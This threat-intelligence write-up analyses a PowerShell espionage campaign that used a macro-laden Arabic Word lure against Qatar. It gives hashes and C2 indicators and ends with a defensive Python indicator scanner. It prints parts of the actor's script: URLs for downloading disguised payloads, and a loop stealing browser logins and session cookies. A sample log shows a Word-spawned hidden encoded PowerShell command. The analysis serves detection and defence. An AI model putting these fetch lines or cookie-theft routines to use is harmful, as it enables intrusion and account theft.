Parliament Crew? Who? We may all know of George Clinton and the famous funk music group “Parliament-Funkadelic,” but “Parliament Crew”! They may not have all the musical swag of the band, but they sure have PowerShell swag!
Background:
In the past year, an active cyber-espionage campaign was conducted by sending weaponized MS Word documents that trigger PowerShell to do all the dirty work once the victim enables the macro. The group behind this campaign targeted Parliaments across the Middle East, including Jordan, Iraq, and Lebanon, as well as other political entities. Hence the name “Parliament Crew.” This group’s intelligence collection is focused on the Middle East, which happens to be one of the hottest political zones in the world.
On March 6th, 2019 the group was targeting their #1 victim, “Qatar.” They sent a document in Arabic entitled “بيان صحفي تدشين الربط الالكتروني بين قطر الخيرية ورلد جك” (rough translation: The electronic connection between Qatar charity and the world).
File: بيان صحفي تدشين الربط الالكتروني بين قطر الخيرية ورلد جك.doc
SHA1: 9123d4212198444c70dbf625e6f1fb34ed28dd0b
MD5: 48e82912b0769bd3ab3f1d406bc1c5cc
“The bigger the headache, the bigger the pill.”
― George Clinton
In Parliament Crew’s perfect world the victim opens the file, wmic.exe launches PowerShell, and their super long and complicated script works, but this time the pill was the headache! Somebody tell the mothership it can’t take Qatar! Why? Not because of any active defense by the victim, but because it appears their “complex” PowerShell script doesn’t work right.
**The PowerShell Script would probably send your AV products crazy.**
To view the obfuscated version of the PowerShell: https://pastebin.com/1MHMmTwD
Now, you may be scratching your head and thinking: is this some ASCII art, or one of those things with a hidden image in it? Sadly, no. It’s just an ugly compressed PowerShell script.
After converting all that nasty, garbled-up PowerShell to ASCII, here are the exciting things we can observe:
To view the decoded version of the PowerShell: https://pastebin.com/4R9tk4ic
C2: f6lvapzvn1.linkpc.net IP: 92.240.245.173
Additional downloaders disguised as “JPEG” files are downloaded depending on whether the victim is running a 32- or 64-bit system. Parliament Crew has set up a very savvy SQLite database on their C2 to help streamline and organize all the exfiltrated data. The downloads below are designed to help organize the data and put it into the proper database schema format.
$global:SystemDataSQLite = "http://www.9ory.com/uploads/1543938654841.jpeg"
$global:x64SQLiteInterop = "http://www.9ory.com/uploads/1543938654852.jpeg"
$global:x86SQLiteInterop = "http://www.9ory.com/uploads/1543938654863.jpeg"
Option to change the User-Agent string for Windows and Apple (excerpt; the script’s remaining format arguments are cut off here):
$webrequest.UserAgent = $("Mozilla/5.0 ({0}; {1}; {2}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36" -f [Environment]::OSVersion.ToString().Replace("Microsoft Windows ", "Win"),
Parliament Crew can change the user agent string depending on what needs to be collected from the victim. Below is an excerpt from the decoded PowerShell script that indicates which information and credentials they are interested in (browser logins, plus session cookies for Google, Microsoft Live, Yahoo, foreign-ministry domains, and iCloud):
InitLOGGER
while ($true) {
    BrowsersLOGINS
    BrowsersCOOKIES "'%.google.%'" "'SSID'"
    BrowsersCOOKIES "'%.live.%'" "'MSPAuth'"
    BrowsersCOOKIES "'%.yahoo.%'" "'T'"
    BrowsersCOOKIES "'%.mofa.gov.%'" "'cadataKey'"
    BrowsersCOOKIES "'%.icloud.%'" "'X-APPLE-WEBAUTH-TOKEN'"
Keep in mind the following regional issues that would make Parliament Crew and possibly their backers perform this campaign:
Indicators:
File: بيان صحفي تدشين الربط الالكتروني بين قطر الخيرية ورلد جك.doc
SHA1: 9123d4212198444c70dbf625e6f1fb34ed28dd0b
MD5: 48e82912b0769bd3ab3f1d406bc1c5cc
C2: f6lvapzvn1.linkpc.net
IP: 92.240.245.173
1543938654841.jpeg
SHA1: 54b4ef76e21464dec580ae3313d0720dea6ec09c
MD5: de3419a82c6eea500417c2987b56ccd5
1543938654852.jpeg
SHA1: 58933a1e66c7a6dff37a22901c1769d138b27804
MD5: c7e662156f550bca0f9f97580ee788e2
1543938654863.jpeg
SHA1: 7bc7e957be4d5094c94772ce2675cf5b6228dc66
MD5: ee3dba546e63837fdf9f46f58efcb539
PowerShell Script: https://pastebin.com/1MHMmTwD
PowerShell Decode: https://pastebin.com/4R9tk4ic
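As an added example from the defender’s side (this is not code from the post or from the actor’s script), here is a small Python scanner that matches telemetry against the indicators published in this post: the Word → wmic.exe → PowerShell execution chain, the C2 host and IP, the three “JPEG” download URLs, and the file hashes. The pipe-delimited log format, the sample process names, paths and command lines in SAMPLE_LOG, and the rule names are all constructed for the example; only the domain, IP, URLs and hashes come from the post.

```python
"""Added example (not from the post or the actor's script): match constructed
endpoint and proxy events against the indicators this post lists."""
from dataclasses import dataclass
from typing import List, Optional

# Indicators as published in the post: C2 host and IP, the three "JPEG" URLs,
# and the SHA1 hashes of the lure document and the three downloads.
C2_HOSTS = {"f6lvapzvn1.linkpc.net"}
C2_IPS = {"92.240.245.173"}
DOWNLOAD_URLS = {
    "http://www.9ory.com/uploads/1543938654841.jpeg",
    "http://www.9ory.com/uploads/1543938654852.jpeg",
    "http://www.9ory.com/uploads/1543938654863.jpeg",
}
BAD_SHA1 = {
    "9123d4212198444c70dbf625e6f1fb34ed28dd0b",  # the .doc lure
    "54b4ef76e21464dec580ae3313d0720dea6ec09c",  # 1543938654841.jpeg
    "58933a1e66c7a6dff37a22901c1769d138b27804",  # 1543938654852.jpeg
    "7bc7e957be4d5094c94772ce2675cf5b6228dc66",  # 1543938654863.jpeg
}

# Constructed sample telemetry in a made-up pipe-delimited shape:
#   proc|<parent image>|<child image>|<command line>
#   net|<process>|<destination host>|<IP or URL>
#   file|<process>|<path>|<sha1>
SAMPLE_LOG = """\
proc|WINWORD.EXE|wmic.exe|wmic process call create "powershell -NoProfile -WindowStyle Hidden -EncodedCommand <omitted>"
proc|wmic.exe|powershell.exe|powershell -NoProfile -WindowStyle Hidden -EncodedCommand <omitted>
proc|explorer.exe|notepad.exe|notepad.exe C:\\Users\\analyst\\notes.txt
net|powershell.exe|f6lvapzvn1.linkpc.net|92.240.245.173
net|powershell.exe|www.9ory.com|http://www.9ory.com/uploads/1543938654852.jpeg
net|chrome.exe|www.example.com|https://www.example.com/
file|powershell.exe|C:\\Users\\analyst\\AppData\\Local\\Temp\\1543938654852.jpeg|58933a1e66c7a6dff37a22901c1769d138b27804
"""


@dataclass
class Finding:
    line_no: int
    rule: str
    detail: str


def check_process(parent: str, child: str) -> Optional[str]:
    """The execution chain the post describes: Word macro -> wmic.exe -> PowerShell."""
    parent, child = parent.lower(), child.lower()
    if parent == "winword.exe" and child in {"wmic.exe", "powershell.exe"}:
        return "office_spawned_" + child.split(".")[0]
    if parent == "wmic.exe" and child == "powershell.exe":
        return "wmic_spawned_powershell"
    return None


def check_network(host: str, target: str) -> Optional[str]:
    """Match the C2 host/IP and the disguised-JPEG download URLs from the post."""
    if host.lower() in C2_HOSTS or target in C2_IPS:
        return "c2_contact"
    if target in DOWNLOAD_URLS:
        return "disguised_jpeg_download"
    return None


def check_file(sha1: str) -> Optional[str]:
    """Match a written file against the published SHA1 hashes."""
    return "known_bad_hash" if sha1.lower() in BAD_SHA1 else None


def scan(log_text: str) -> List[Finding]:
    """Run every event line through the check that applies to its kind."""
    findings: List[Finding] = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        # maxsplit keeps pipes inside a command line from breaking the field layout
        kind, *fields = line.split("|", 3)
        rule = None
        if kind == "proc" and len(fields) >= 2:
            rule = check_process(fields[0], fields[1])
        elif kind == "net" and len(fields) >= 3:
            rule = check_network(fields[1], fields[2])
        elif kind == "file" and len(fields) >= 3:
            rule = check_file(fields[2])
        if rule:
            findings.append(Finding(line_no, rule, line))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule}: {f.detail}")
```

Run against SAMPLE_LOG, the scanner flags the two process-chain events, the C2 contact, the download of one of the “JPEG” files, and the matching hash of the file once written to disk, while the unrelated notepad and browsing events pass through silently. The process-chain rule is the most durable of the three, since hosts, URLs and hashes change between campaigns while an Office process spawning wmic.exe or PowerShell rarely has a legitimate reason to happen.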